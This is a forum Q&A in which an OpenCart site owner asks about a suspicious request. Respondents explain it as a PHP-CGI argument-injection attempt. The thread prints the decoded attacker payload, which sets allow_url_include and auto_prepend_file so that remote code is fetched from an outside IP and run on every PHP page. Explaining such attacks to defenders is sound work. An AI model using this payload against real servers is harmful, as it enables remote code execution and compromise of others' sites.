I noticed an unusual activity on my site (e-commerce opencart 2.0.2.0)
This is the command you used
I do not know exactly what it looks like exploiting a php fault and inserting a backdoor I have the code that was injected or not yet I do not know apparently it deleted the text of the server it was on but I made a copy if someone wants to analyze Let me know what I'm saying.
Now my question is how do I know if his attack was successful how to fix the problem?
This is a hacking attempt that relies on a PHP vulnerability in CGI mode where php-cgi receives the query string as command-line arguments, allowing options to be included via URL.
By decoding the URL you can read the settings that the attacker attempted to insert:
-d allow_url_include=On -d auto_prepend_file=http://49.212.157.58/policy/r.txt
The -d option sets a new value for an INI entry and if successful all PHP files would include (and execute) the remote file r.txt , which opens up many possibilities of what the attacker could do. / p>
Theoretically, by the code posted in the url, they tried to make an attack where, using a possible allow_url_include enablement in php.ini, tried to execute a command via url (I think in some previous versions of PHP there was this failure), which would cause the policy/r.txt file to be included in any php script automatically.
That is, if the attacker succeeded, it would probably be tragic for you.
Maybe what happened in this case is an attempt by a exploit .
It's worth remembering that because they try to invade your system, it does not mean that they have been successful.